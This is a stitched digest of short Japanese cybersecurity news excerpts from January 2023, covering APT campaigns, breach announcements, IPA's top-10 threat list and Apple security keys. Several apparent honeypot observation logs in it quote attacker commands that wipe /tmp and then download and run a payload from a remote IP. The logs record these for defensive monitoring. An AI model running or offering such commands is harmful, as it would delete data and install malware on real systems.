自分のiPhoneの挙動がおかしいと感じたことがあるユーザーも少なくないはずだ。比較的堅牢とされるiPhoneであってもセキュリティリスクは存在し、過去には少なからず被害の事例も報告されている。この記事では、iPhoneに生じ得るセキュリティリスクにどのようなものがあるのか、そしてどのような対策が求められるのか解説する。 iPhoneが安全だとされる理由 自分が使っているスマートフォン（以下、スマホ）はiPhoneのため、セキュリティ被害は生じないだろうと考えるユーザーも少なくない。実際、iPhoneを提供するアップル社では、Macも含めて堅牢なセキュリティを売りの1つとしている。その堅牢性を支えている、セキュリティ強度を高める機能や仕組みには以下のようなものがある。 App Store上での厳格な審査 iPhoneにインストール可能なアプリは、アップル社が運営している「App Store

メール 情報システム担当者向け 2023.1.18 日本の政治団体を標的にした、APTグループ「MirrorFace」のスピアフィッシングキャンペーンとは？ 2022年の参議院選挙を目前に控えた日本の政治団体が、APTグループ「MirrorFace」によるスピアフィッシングの標的とされていたことをESET社の研究者が明らかにしました。この攻撃の調査の過程で発見した、認証情報を窃取するための新たなツールと、フィッシング攻撃の内容を解説します。 ESET社が追跡しているAPTグループ「MirrorFace」が、2022年7月の日本の参議院選挙までの数週間にわたってスピアフィッシングキャンペーンを実行していたことが明らかになりました。ESET社は、このキャンペーンを「LiberalFace作戦」と命名しました。このキャンペーンは、日本の政治団体を標的にしており、ESET社の調査から、特定の政党の

ファイアウォールとは、インターネット経由の攻撃への「防火壁」のような役割を担う機能として、サイバー攻撃対策の1つとして利用されている。このファイアウォールを一時的に無効にする場合、どのようなリスクが生じ得るのだろうか。この記事では、ファイアウォールを無効にすることで、どのようなリスクが生じるのか解説する。 ファイアウォールとは ファイアウォールを直訳すると「防火壁」となるが、それは火事が燃え広がることを防ぐために設けられた壁のことだ。インターネット業界で用いられるファイアウォールも、そうした意味から転じたものである。 インターネットの文脈で使われるファイアウォールという言葉は、外部ネットワークからの攻撃を防ぐ機能・ソフトウェア、あるいはハードウェアを指す。ファイアウォールは主に、一般的なファイアウォールとパーソナルファイアウォールの2つに大別できる。 （一般的な）ファイアウォール 企業内や

サイバーセキュリティに関する専門的な知識やスキルを持った人材を求める企業が増え続けています。Cybersecurity Venturesによりますと、世界のサイバーセキュリティ人材の求人の数は、2013年には約100万人ほどでしたが、2021年には350万人と、3.5倍増加しています。当社のリサーチャーは、この先5年間も求人数は変わらないと予測しています。 この状況の背景にあるのは、即戦力となる実務の経験や適性を持つスペシャリストが不足しているという現実があります。学生が大学院でサイバーセキュリティ、コンピューターサイエンス、またはそれに類する分野の学位を取得していたとしても、働きたいと希望する企業が求める専門性と異なる場合があり、採用に至るとは限りません。また、企業が設ける要件のなかには、リバースエンジニアリングのハードスキルがあります。サイバー犯罪者は一般的に、他にはない自作のプログラ

韓国語話者のAPT攻撃グループ、Andariel、Lazarus、BlueNoroffの最新情報について、当社GReATのリサーチャーに聞きました。 カスペルスキーのグローバル調査チーム、GReATは、長年APT（持続的標的型）攻撃グループの一つ「Lazarus (ラザルス)」を研究しています。このグループは主に、金銭窃取やデータ破壊を目的、サイバー諜報活動や業務妨害攻撃を行う特に悪質な集団で、2009年から活動していることがわかっています。被害は主に、韓国、日本、インド、中国、ブラジル、ロシア、トルコなどです。彼らが使用するマルウェアの実行ファイルサンプルのうち３分の２に韓国語（朝鮮語）話者の要素、グリニッジ標準時+8～9時間のタイムゾーンにおける就業時間中にプログラムがコンパイルされる、など複数の特徴があります。2022年10月、金融庁と警察庁、内閣サイバーセキュリティセンターは、La

韓国語話者のAPT攻撃グループBlueNoroffが、WindowsのMark-of-the-Webをバイパスする方法を使用していることを確認しました。 通常、メールに添付されたWord文書を開いたり、Webサイトから文書をダウンロードしようとすると、それらのファイルは、保護モードで開封されます。このとき使われるのは、Windowsデフォルトの保護メカニズムの1つであるMark-of-the-Web（MOTW）という機能です。この機能は、ユーザーが文書ファイルをインターネットからダウンロードするときに、その文書に印をつけ、アプリケーションがファイルの出所を把握し、潜在的なセキュリティリスクを確認してユーザーに注意喚起するものです。ユーザーにとって便利な機能ですが、最近になって、攻撃者がこのMOTWを回避する方法を使うケースが増えていることが明らかになりました。例えば、カスペルスキーの専門家

一日中家の中をさまようロボット掃除機に自宅の中を監視されていたら…　個人のプライバシーを守るためにできることをお伝えします。 最近、床の位置から盗撮されたような写真が数枚、ネット上に拡散されました。そのうちの一つは、ラベンダー色のTシャツを着た女性がズボンを下げてトイレに座っています。これらは、ロボット掃除機に搭載されているカメラによって撮影された画像です。ロボット掃除機は　障害物を避けながら自走して床を掃除してくれる非常に便利な家電製品で、最近では使う人も増えてきました。しかし、このようなスマート家電製品が使用中のトイレの中を撮影できると知ったらどう感じますか？今回は、画像流出の原因と被害に遭わないための対策について解説します。 掃除機にカメラがついている理由 すべてのロボット掃除機にカメラが搭載されているわけではありません。通常、取扱説明書には、すべてのセンサーとその位置が示されていま

2022年11月、アメリカとカナダの大学の研究者たちが、ドローンを使って、建物の外からWi-Fi機器の位置を特定する方法を発表しました。この方法は、Wi-Peepと呼ばれ、Wi-Fiと「peep（のぞき見の意味）」を組み合わせた造語です。同一のWi-Fiを介して互いに通信するデバイスを「のぞき見」することが可能なため、その名がつけられました。この研究によって、Wi-Fiネットワークの特定の機能や、デバイスの位置が特定されてしまう潜在的なリスクが、初めて指摘されました。ただ、映画「007」のジェームズ・ボンドを連想させるようなこのWi-Peep攻撃が発生する可能性はそれほど高くはありません。しかし、Wi-Fi機器の場所が特定されると、どのようなリスクがあるのかは知っておくべきです。 Wi-Peep攻撃の特徴 研究結果を詳しく見る前に、ここで実際の生活における攻撃はどのようなものかを考えてみま

この時期であれば、NAUGHTYリスト*ともいうべき、バグレポートへようこそ！ホリデーシーズンには、ツリーの下のプレゼントに重大なバグが隠されているものですが、そのうち2件はまだ謎のままです。休暇中はサイバー脅威も停止すると思いたいかもしれませんが、それらは続いています。12月はNSAによる言及、またCitrixについてもありました。 *悪い子リストのことで、名前がリストに載ってしまうとサンタさんからプレゼントがもらえません。 CVE-2022-27518 Citrix ADC または Citrix Gateway をSAML SP または SAML IdPとして構成しましたか。もしそうであれば、あなたは、Citrix ADC および Citrix Gateway に影響を及ぼす新しい未認証のリモート コード実行 (RCE) 脆弱性の勝者に該当します。 さらに、APT5 の標的にされた可能

サイバー犯罪者も「ChatGPTを使ってコーディング」をしている　チェック・ポイント：攻撃者は「スクリプトを仕上げるために手を貸してくれた」と投稿 チェック・ポイント・ソフトウェア・テクノロジーズは脅威アクターがOpenAIのChatGPTを悪用して悪質なコードを生成していることを、実例のサンプルとともに公開した。AIの悪用がサイバー犯罪の新たなトレンドになりつつあることを警告している。

ハニーポット(仮) 観測記録 2023/01/14分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP .jsへのスキャン行為 /.gitへのスキャン行為 を確認しました。 Location:US Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス /.gitへのスキャン行為 WordPressへのスキャン行為 phpMyAdminへのスキャン行為 5.188.210.227に関する不正通信 を確認しました。 Location:UK NetGear製品の脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス .jsへのスキャン行為 を確認しました。 Lo

ハニーポット(仮) 観測記録 2023/01/16分です。 特徴 共通 Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 WordPress Pluginへのスキャン行為 phpMyAdminへのスキャン行為 Location:JP masscanによるスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 5.188.210.227に関する不正通信 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 179.43.187.243/jaws; sh /tmp/jaws Location:US GPONルータの脆弱性を狙

2023年1月24日、警視庁は退職後に男が元勤務先のデータの削除を行ったとして不正アクセス禁止法違反と電子計算機損壊等業務妨害の容疑で逮捕したと発表しました。ここでは関連する情報をまとめます。 退職時に社内システムの認証情報を持ち出しか 容疑は不正アクセス禁止法違反と電子計算機損壊等業務妨害。男は2022年6月4日、自宅近くの喫茶店のWifiに接続し、以前に勤務していた都内の電気計器メーカーの元同僚のIDを使って、元上司のPCを遠隔操作し、社内ネットワークやクラウドサービスに不正ログイン。サーバー上で保管されていたデータを削除することで同社の業務を妨害した疑いがもたれている。*1 *2 男は取り調べに対して「自分は行っていない」と容疑を否認している。男は社内で人間関係の悪化(元同僚とのトラブルと報道)を理由に2021年12月に同社を退職しており、警視庁は同僚らへの嫌がらせを目的に行ったとみ

ハニーポット(仮) 観測記録 2023/01/18分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 /.gitへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス fasthttpによるスキャン行為 masscanによるスキャン行為 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 45.12.253.180/jaws; sh /tmp/jaws Location:US Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス Spring Cloud Gate

ハニーポット(仮) 観測記録 2023/01/13分です。 特徴 共通 Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス zgrabによるスキャン行為 .jsへのスキャン行為 /.envへのスキャン行為 Location:JP Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス D-link製品の脆弱性を狙うアクセス Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス ThinkPHPの脆弱性を狙うアクセス Apache Solrへのスキャン行為 Laravelへのスキャン行為 phpMyAdminへのスキャン行為 UserAgentがHello, worldであるアクセス

レンタルWi-Fiサービスを提供するベストリンク株式会社は1月11日、同社が運営する「e-ca公式サイト」における個人情報漏えいについて発表した。 これは同社が運営する「e-ca公式サイト」で利用していた画面表示を最適化するサービスを提供する株式会社ショーケースのシステムに対し不正アクセスによる改ざんがあり、顧客のカード情報が漏えいした可能性が判明したというもの。

Roaming Mantisに関する最新情報。2022年の調査で見られた攻撃活動の変化や、新たに取り入れられた手法について解説します。 カスペルスキーは、2018年から、サイバー攻撃キャンペーン「Roaming Mantis（ローミングマンティス　別名Shaoye）」に関する情報を追跡、調査し続け、これまで６回に渡ってブログで情報を公開しました。Roaming Mantisは、強い金銭的動機に基づき、悪意あるAndroidアプリを拡散したり、またターゲットをフィッシングページに移動させて認証情報などを窃取します。2022年初めに公開したブログでは、スミッシングを通じてマルウェアの感染をフランス、ドイツなどヨーロッパへ拡大していることや、ランディングページのスクリプトを難読化するなどして、活動を隠ぺいするような行動も確認されました。 カスペルスキーのリサーチャーは新たに、Wi-Fiルーターに

市民生活協同組合ならコープは1月18日、サイバー攻撃によるシステムトラブルに伴う個人情報の漏えいについて発表した。 同組合では2022年10月9日早朝に、ならコープネットワークに接続ができないとの連絡があり調査したところ、同組合の基幹システムサーバをはじめとする複数のシステム機器に第三者からのサイバー攻撃があり、セキュリティソフトがネットワークを遮断したことが判明したというもの。

カジュアルファッションを取り扱う株式会社アダストリアは1月19日、同社サーバへの不正アクセスについて発表した。 これは1月18日に、同社が管理運用するサーバに対し第三者からの不正アクセスを確認したというもので、同社では被害拡大防止のためにネットワークの遮断等の対応を実施するとともに、関係機関に報告を行っている。

エージェント型のセキュリティがクラウドで通用しなくなり、コスト増でビジネスを阻害する理由：金融企業のPaidyはセキュリティ運用にかかるコストを年間50万ドル削減 クラウドの利用が当たり前になる中、クラウドのセキュリティをどう保証するかが問題になってきた。クラウドのセキュリティリスクは事業継続を脅かしかねない事態につながることもあり重要な経営課題といえる。クラウドリスクで特に多いのが設定不備や作業の不手際だ。その理由は一体何か。どのように対策すればいいのだろうか――。 「セキュリティ対策はクラウド事業者が担うもの」クラウド時代に広がる厄介な誤解 クラウドの利用が当たり前になる中、クラウドのセキュリティをどう保証するかが課題になってきた。日々のニュースにあるように、クラウド上に保存していた個人情報や重要情報が攻撃者に不正に搾取され、企業が補償金や賠償金を支払ったり、企業ブランドが大きく毀損（

情報処理推進機構（IPA）は1月20日、気になるサイバー攻撃や自社の情報セキュリティ対策状況といった情報を入力すると、想定損害額や対策、効果などの情報を出力するExcelシート「NANBOK」を公開した。 従業員数やサービスの提供状況、「インシデントの初動対応を自社で実行できますか？」といった対策状況を入力すると、想定損害額を算出。攻撃手口の解説、具体的な対策製品・サービス、国内の導入状況、対策で得られる効果なども提示できる。 IPAは、情報セキュリティ製品購入の予算確保において「担当者は情報セキュリティ対策を経営者が理解できる言葉で説明することに苦悩し、自社のセキュリティ対策を遂行するための予算確保に苦労する方が多い」として、支援ツールの提供を決めたとしている。 関連記事 年末年始はいつも以上にご用心！　IPAの「情報セキュリティ注意喚起」で万全な仕事納めを 年末年始の長期休暇では、シス

田舎の母のスマホにいつの間にか、謎の“空白アプリ”がインストールされていた──そんなツイートが話題になっている。投稿者のオロゴン（＠orogongon）さんによると、母から「スマートフォンへの警告が頻繁に出る」と連絡を受け、調べたところアイコンとアプリ名が空白のアプリが見つかったという。 オロゴンさんに話を聞くと「『スマホがウイルスに汚染された』などの警告が頻繁に表示されると田舎の母から相談があった」と経緯を説明。リモートアクセスツールを使い、母のスマートフォンを遠隔操作したところ、アイコンと名称が空白のアプリを発見したという。このアプリをアンインストールしたところ、状況は落ち着いたとしている。 母のスマートフォンは「Galaxy」シリーズ（型番は不明）。空白のアプリの入手先については「YouTubeの広告経由でインストールしたのではないか」と予想している。アプリのデベロッパーなどの詳細は

SBOM：あなたのソフトウェアには何が含まれていますか？ Synopsys Editorial Team Jan 22, 2023 / 1 min read ソフトウェア部品表（SBOM）は、ソフトウェアやアプリケーションを構成する「コンポーネント」の一覧、つまり、「部品の一覧」です。現在、企業に SBOMの公開を求める圧力がかかっているのは、ソフトウェアに問題が発生した場合に誰が責任を負うかという問題が生じるからです。 SBOMを理解するためには食品の例が分かりやすいでしょう。例えば、私の手元のチョコチップクッキーの原材料の欄には、小麦粉、砂糖、バター、チョコチップ、卵、バニラ、重曹、塩などが記載されています。さらにチョコレートチップには、砂糖、チョコレート、ココアバター、脱脂乳、乳脂肪、大豆レシチンが含まれていることが括弧書きされています。 もし、チョコレートチップに「汚染されたココア

ネット上で個人情報を共有する危険性、ドキシングを防ぐ方法やドキシングされた場合の対応について解説します。 ネットいじめやネットストーカー　―　インターネットのユーザー、特に女性の間で近年、深刻な問題となっています。そして女性が直面するネット上の問題の一つがドキシング（doxing）です。ドキシングとは、悪意のある攻撃者が、個人情報を本人の同意なくネット上でさらす行為を指します。他にもテクノロジーを使った嫌がらせがありますが、ドキシングもネット上だけの問題から、実生活にも影響が及ぶ可能性があります。 この問題に立ち向かうべく、カスペルスキーは最近、シンガポール女性団体協議会（SCWO）と共同でワークショップを開催しました。このワークショップの動画はこちらでご覧いただけます。ドキシングの被害に遭わないためのヒントについては、本ブログの後半へ進んでください。 ドキシングの定義、女性が被害にあうケ

ハニーポット(仮) 観測記録 2023/01/17分です。 特徴 共通 /.envへのスキャン行為 Location:JP F5 BIG-IP製品の脆弱性(CVE-2022-1388)を狙うアクセス GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 okhttpによるスキャン行為 .cssへのスキャン行為 .jsへのスキャン行為 /.gitへのスキャン行為 UserAgentがHello, Worldであるアクセス UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 5.255.105.71/76d32be0.sh; sh /tmp/76d32be0.sh Location:US GPONルータの脆弱性を狙うアクセス Liferay

2023年1月18日、警視庁葛西署は、不正アクセス禁止法違反の容疑で男を逮捕したと発表しました。男は複数の女性のインスタグラムアカウントへ不正ログインした疑いがもたれています。ここでは関連する情報をまとめます。 60人以上のインスタアカウントに不正ログインか 逮捕は2023年1月16日で不正アクセス禁止法違反、私電磁記録不正作出・同供用の容疑。2020年8月から2022年10月にかけて、自分のスマートフォンなどを使い面識のない東京、埼玉、神奈川などに住む女性9人のインスタグラムアカウントに対して59回にわたり　不正にログインを行い、個人情報をのぞき見たり、本人になりすましメッセージ送信を行うなどをした疑いがある。*1 男は不正ログイン後にアカウントのパスワードや登録された電話番号の変更を行っていたとみられ、2020年8月に被害に遭った女性の一人がアカウントにログインできないと警察へ相談した

株式会社北関東マツダは1月、同社委託先への不正アクセスによる個人情報の流出について発表した。 これは1月14日に、同社が顧客情報を含む個人情報の管理等を委託する委託先のサーバに第三者からの不正アクセスがあり、サーバに保存されていた個人情報のうち少なくとも50,000件程度が流出した可能性が判明したというもの。

国立大学法人琉球大学は1月20日、学内で利用するクラウドサービス内に保存されていた個人情報等が含まれたファイルの一部が同学構成員に閲覧可能であったと発表した。 これは学内で利用していた Microsoft Teams 内に保存されていた個人情報等が含まれたファイルの一部について、情報共有者の限定やパスワードの設定を行っておらず、担当者のみが共有すべき情報が学生や職員等の同学構成員に閲覧可能な状態であったというもの。

アカマイ・テクノロジーズ職務執行者社長の日隈寛和氏と、ラック代表取締役社長の西本逸郎が対談し、現代のユーザー企業が抱えるセキュリティ上の課題と求められる対策について意見を交わした。 アカマイ・テクノロジーズ職務執行者社長の日隈寛和氏（右）と、ラック代表取締役社長の西本逸郎 CDNの基盤を活用してインターネットのセキュリティ機能を展開 ラック 西本 アカマイ・テクノロジーズとラックは10年来の付き合いですね。もともとCDN（コンテンツ配信ネットワーク）を提供していたアカマイ・テクノロジーズがセキュリティ分野に進出した経緯はどういったものだったのでしょうか。 アカマイ 日隈氏 米Akamai Technologiesが設立された当時（1998年）のインターネットは、サーバへのアクセスを分散する仕組みがなく、ネットワークが渋滞してしまう状態でした。これを解決するため、まずは世界中にエッジサーバを

CookieとはWebサイトにアクセスした際に付与されるテキストファイルのことを指し、そこには利用者のログインIDやサイトへのアクセス履歴、訪問回数などの情報が付与されています。 このCookieがあることで、SNSなどログインが必要なサイトに再度アクセスした際に改めてログインする必要がなくなります。またショッピングサイトなどでカートに商品を保存することができるのもCookieによるものです。 Cookieには「ファーストパーティ」「サードパーティ」の2種類があります。 ファーストパーティ 実際に訪問したWebサイトのドメインから発行されるCookieです。Webサイトごとに独自発行されるため、発行元のサイトでしか機能しません。異なるブラウザやデバイスでアクセスした場合は同一ユーザーだと認識されません。 サードパーティ 訪問したWebサイトのドメインではなく、第三者ドメインから発行されるC

サイバー攻撃に関する報道でおなじみの「トロイの木馬」とは、マルウェアの一種とされる。近年、世界的に猛威を振るっている「Emotet（エモテット）」もトロイの木馬の1つに分類される。この記事ではトロイの木馬とはどのようなマルウェアなのか、これまでのマルウェアの定義の変遷を振り返りながら解説する。 トロイの木馬とは？ トロイの木馬とは、「悪意のあるソフトウェア（Malicious Software）」、すなわちマルウェアの一種だ。ほかのマルウェアとどのように異なるのか、「トロイの木馬」の意味するところを以下に説明する。 １）ウイルスやワーム、スパイウェアとの違い ウイルスは「単体で存在できず、宿主を必要とし、自己増殖する」という性質を持つマルウェアだ。生物学上のウイルスと区別するために、コンピューターウイルスと呼ばれることもある。ワームはウイルスと異なり、「単体で存在を確立」し、同様に自己増殖

株式会社 長寿乃里は1月19日、同社のECサイト「あっとよか（ https://www.chojyu.com/ ）」が利用するサービスを提供する株式会社ショーケースへの不正アクセスによるクレジットカード情報の漏えいについて発表した。 これは同社会員サイト「あっとよか」が利用する、顧客の端末に合わせてWebページの表示を最適化する「サイト・パーソナライザ」を提供するショーケース社のシステムの脆弱性を突いた第三者の不正アクセスでソースコードの改ざんが行われたことで、会員が入力したカード情報が漏えいした可能性が判明したというもの。

公益社団法人日本臓器移植ネットワーク（JOT）は1月20日、同社団への不正アクセスについて発表した。 これは1月9日から、JOTのメールサービスに対し海外からのセキュリティ攻撃があり、外部からの問い合わせに利用するメールアドレスのアカウントに侵入されたことでメールデータの一部が消失したというもの。

仮設機材の販売やレンタルを行う東証プライム上場企業の株式会社タカミヤは1月23日、同社グループへのランサムウェア攻撃について発表した。 これは同社と同社子会社の株式会社キャディアン、株式会社トータル都市整備、株式会社青森アトム、株式会社エコ・トライ、株式会社タカミヤの愛菜、八女カイセー株式会社、株式会社イワタ、株式会社ヒラマツ、株式会社ナカヤ機材を含むタカミヤグループのサーバに第三者から不正アクセスがあり、ランサムウェア感染被害が確認されたというもの。

デジタルペンテスト部でペネトレーションテストを担当している小松奈央です。 たまに新卒採用活動のお手伝いをさせていただくことがあり、セキュリティ業界を目指す学生さんや、配属先が決まる前の内定者の方とお話する機会があります。そういった際に将来どのような仕事をしたいか聞くと、ありがたいことにペネトレーションテスターになりたいという方が少なくありません。また、ペネトレーションテスターになるためにはどのような勉強をしたら良いかという質問もよくいただきます。 そこで今回は、普段私が実際にペネトレーションテストの検証や、新しい攻撃技術を勉強する際に使用している環境1について、その概要とどのような使い方をしているかをご紹介します。 検証環境の全体像 各ホストの概要 ドメインコントローラ（構築優先度：高） クライアント端末（構築優先度：高） 情シス用端末（構築優先度：中） データベースサーバ（構築優先度：低

QRコードを記載したメールは怪しむべし すでにフィッシング詐欺の半分以上を占めるとも言われているAmazonを騙った偽メール。そのバリエーションがまた1つ増えました。今度はQRコード入りです。 通常、フィッシング詐欺メールには、受け取った人たちを偽Webサイトに誘導するためのURLが記載されています。ところが、今回見つかった詐欺メールにはURLの文字列の代わりにQRコードが表示されていました。 リンク先のURLがあからさまに怪しい場合、すんでのところでフィッシング詐欺を見抜ける可能性がありますが、QRコードではどうにもなりません（そもそもURLを頼りに真偽を見分けようとする行為は危ういですが）。 こうしたQRコード入りの詐欺メールに対してフィッシング対策協議会では、「一般的にQRコードを記載したメールは不正メールの可能性が高いです。日頃からサービスへログインする際は、メールやSMS内のリン

1. はじめに はじめまして、この投稿がZennの初投稿となります。 初学者ゆえ至らない点や、不適切な表現があるとは思いますが都度ご指摘していただけると幸いです。 この記事についてですが、先月から自然言語処理を今のトレンドであるTransformerを主軸に勉強し始めており、インプットだけでなくアウトプットのためZennを書こうと思ったのがきっかけです。 (同様にQiitaにてベイズに関するアウトプットも行なっています。) また、参考資料については下にも書いてはいますが「Transformerによる自然言語処理」をメインにしています。 といってもこの本は誤翻訳がひどいので自分で調べながらやる必要があり、二度手間になるかもです。ただ内容としては初学者の自分でも理解でき、GitHubに公開されているJupiter Notebookと同時に進めれば誤翻訳もまあ修正できると感じたので個人的には良い

iOS 16.3公開、マイナーチェンジだけどセキュリティは強化2023.01.25 11:0010,777 Florence Ion - Gizmodo US ［原文］ （ R.Mitsubori ） マイナーチェンジも積もれば、山になる。 まだiPhoneをチェックしていないユーザーの方、1月23日（米現地時間）Appleからアップデートが公開されていますよ。iOS 16.3アップデートはバグ修正やインターフェースの調整、第2世代HomePodと温度センサー対応、新しい壁紙など、比較的マイナーチェンジになっています。また、Apple IDログイン時の2ファクタ認証で物理的なセキュリティキーが使えるようになり、セキュリティを強化するオプション機能が追加されています。 セキュリティキー機能については昨年末のプレスリリースですでに予告されており、Yubikeyなどのサードパーティ製セキュリティ

企業はさまざまな理由でサードパーティのアプリケーション・セキュリティ・テスト・サービスを利用していますが、最大の理由の1つは、訓練を受けた、あるいは経験豊富なセキュリティ専門家が不足していることです。サイバーセキュリティ専門組織の (ISC)2 によれば、サイバーセキュリティ技術者の継続的な不足により、より多くの組織がサイバーセキュリティのニーズにサービスとして対応するようになる可能性があります。また、人員不足を経験している調査回答者の 70%が、サイバーセキュリティのギャップを埋めるためにサードパーティのサービスを使用することを期待していると、(ISC)2 は指摘しています。 そして、そのギャップを埋める必要があることは間違いありません。Forresterのレポート「The State of Application Security: 2022」によれば、Web アプリケーションのエクス

Appleはこのほど、「Apple ID」をハードウェアのセキュリティキーで保護できるようにした。ハッカー、ID泥棒、盗聴者から最大限に保護したいユーザーにとって、これは重要なアップグレードだ。 ハードウェアセキュリティキーは小型の物理的デバイスで、デバイスへのログオン時やアカウントへのログイン時に、USBまたはLightningポート、あるいは近距離無線通信（NFC）で通信する。使用するにはキー本体を所持している必要があるため、自分のアカウントにハッカーがリモートでアクセスするのを未然に防ぐのに有効だ。 Appleは、米国時間1月23日にリリースした「iOS 16.3」と「macOS 13.2」でセキュリティキーのサポートを発表し、24日には「iPhone」「iPad」「Mac」でセキュリティキーを使用する方法について詳細を公開した。同社は少なくとも2つのキーを設定するよう求めている。

「情報セキュリティ10大脅威 2023」簡易説明資料（スライド形式） 情報セキュリティ10大脅威 2023 [組織編] 85ページ(PDF:2.6 MB) 情報セキュリティ10大脅威 2023 [個人編] 84ページ(PDF:2.8 MB) 情報セキュリティ10大脅威 2023 [組織編]（英語版）85ページ(PDF:2.5 MB) 情報セキュリティ10大脅威 2023 [個人編]（一般利用者向け）68ページ(PDF:2.9 MB) 「情報セキュリティ10大脅威 2023」簡易説明資料（脅威個別版） 情報セキュリティ10大脅威 2023 [組織編]（脅威個別版）(ZIP:3.0 MB) 情報セキュリティ10大脅威 2023 [個人編]（脅威個別版）(ZIP:3.1 MB) 10大脅威の引用について 資料に含まれるデータやグラフ・図表・イラスト等を、作成される資料に引用・抜粋してご利用いただ

印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます 日本シノプシスは1月25日、2022年に実施した2700件のソフトウェアのセキュリティテストについて結果の動向を発表した。対象アプリケーションの95％で脆弱（ぜいじゃく）性が検出されたと報告している。 テスト対象の内訳は、82％がウェブアプリケーションおよびシステム、13％がモバイルアプリケーション、残りはソースコードやネットワークシステム／アプリケーションになる。ペネトレーション（疑似侵入）テストや動的なアプリケーションセキュリティテスト（DAST）、モバイルアプリケーションセキュリティテスト（MAST）などの方法で、これらのアプリケーション検査を4300回以上実施したという。 これによると、調査対象の95％で何らかの脆弱性が検出（前

近年、社会に大きな影響を与えているランサムウェア。被害に備えセキュリティ対策の強化以外にサイバー保険を検討しているのではないだろうか。深刻化するランサムウェアよって組織が受ける影響と、サイバー保険による補償を解説する。 近年、社会に大きな影響を与えているサイバー攻撃の最たるものの1つがランサムウェアだ。ランサムウェア攻撃者がとる攻撃手法は近年より凶悪なものとなり、ランサムウェアによって被害組織が受けるダメージも大きくなっている。 ランサムウェアによる被害に備え、セキュリティ対策の見直しや強化をする必要があることはもちろんだが、中にはリスク移転として最近話題になることが増えてきた「サイバー保険」を検討している方もいるのではないだろうか。 この記事では、深刻化するランサムウェア被害により組織が受ける影響と、サイバー保険による補償について紹介する。 ランサムウェア被害組織が受ける影響 被害組織が

死後に困らない＆困らせないアレコレをスマートに託せる「lastmessage」：古田雄介のデステック探訪（1/2 ページ） 入念な死亡確認でラストメッセージを送信する 自分が死んだとき、仕掛かり中の仕事や金銭がらみのことで家族や仲間を困らせたくないし、知られたくない持ち物のことは、やっぱり死後も知られずにいたい――。 ごく当たり前の願望ながら、実現は簡単ではないことも多くの人は知っている。自分がいつ死ぬか分からないし、死後には自分は何もできないからだ。 前者は解決しようがないにしても、後者は信頼できる誰かに情報伝達だけでも委ねることができたら何とかなるかもしれない。「lastmessage」（ラストメッセージ）はその“誰か”になってくれるサービスといえる。 lastmessageは、ITベンチャーのパズルリングが2020年3月に正式リリースしたWebベースのサービスだ。会員登録を行うと、自

パスワード管理ツール「LastPass」開発の親会社であるGoToが、顧客データの暗号化済みバックアップを保存したクラウドストレージへの不正アクセスが2022年11月に発生した件について、この不正アクセスでリモートコンピューター管理ソフトのLogMeIn CentralやLogMeIn Proなどの顧客データの一部がやはり盗み出されていたと発表しました。 Our Response to a Recent Security Incident- GoTo https://www.goto.com/blog/our-response-to-a-recent-security-incident GoTo says hackers stole customers' backups and encryption key https://www.bleepingcomputer.com/news/sec

印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます 情報処理推進機構（IPA）は1月25日、「情報セキュリティ10大脅威 2023」を発表した。トップは前年と同じく、個人が「フィッシングによる個人情報などの詐取」、法人が「ランサムウェアによる被害」だった。 情報セキュリティ10大脅威は、前年に発生した情報セキュリティ事故や攻撃の状況などから脅威を選出。情報セキュリティ分野の研究者や企業の実務担当者など約200人が参加する「10大脅威選考会」の投票により、「個人」「組織」それぞれの立場で上位10種類を決定している。2023年版は、個人、組織とも9位まで前年と同じだった。10位には、個人で「ワンクリック請求などの不当請求による金銭被害」、法人で「犯罪のビジネス化（アンダーグラウンドサービス）

現地時間の2023年1月24日、YouTubeのグローバルヘッドオブラーニングでマネージングディレクターを務めるキャティ・カーツ氏が、アリゾナ州立大学および教養系YouTubeチャンネルのCrashCourseと提携し、大学の単位を取得するための手頃でアクセスしやすいプログラム「Study Hall」をリリースしました。 A new path to higher education that begins on YouTube! https://blog.youtube/news-and-events/higher-education-on-youtube-study-hall/ YouTube unveils new program that enables students to earn college credits | TechCrunch https://techcrunch.

情報処理推進機構（IPA）は1月25日、2022年に起きた情報セキュリティ事案の影響の大きさを示すランキング「情報セキュリティ10大脅威2023」を発表した。法人などの組織向け部門では「ランサムウェアによる被害」が3年連続で1位に。個人向け部門では「フィッシングによる個人情報などの詐取」が2年連続で1位になった。 組織向け部門は、2位が「サプライチェーンの弱点を悪用した攻撃」（前回3位）、3位が「標的型攻撃による機密情報の漏えい」（同2位）、4位が「内部不正による情報漏えい」（同5位）、5位が「テレワークなどのニューノーマルな働き方を狙った攻撃」（同4位）に。 6位は「ゼロデイ攻撃」（同7位）、7位は「ビジネスメール詐欺による金銭被害」（同8位）、8位は脆弱性対策情報の公開に伴う悪用増加（同6位）、9位は「不注意による情報漏えいなどの被害」（同10位）、10位は「犯罪のビジネス化」（前回は

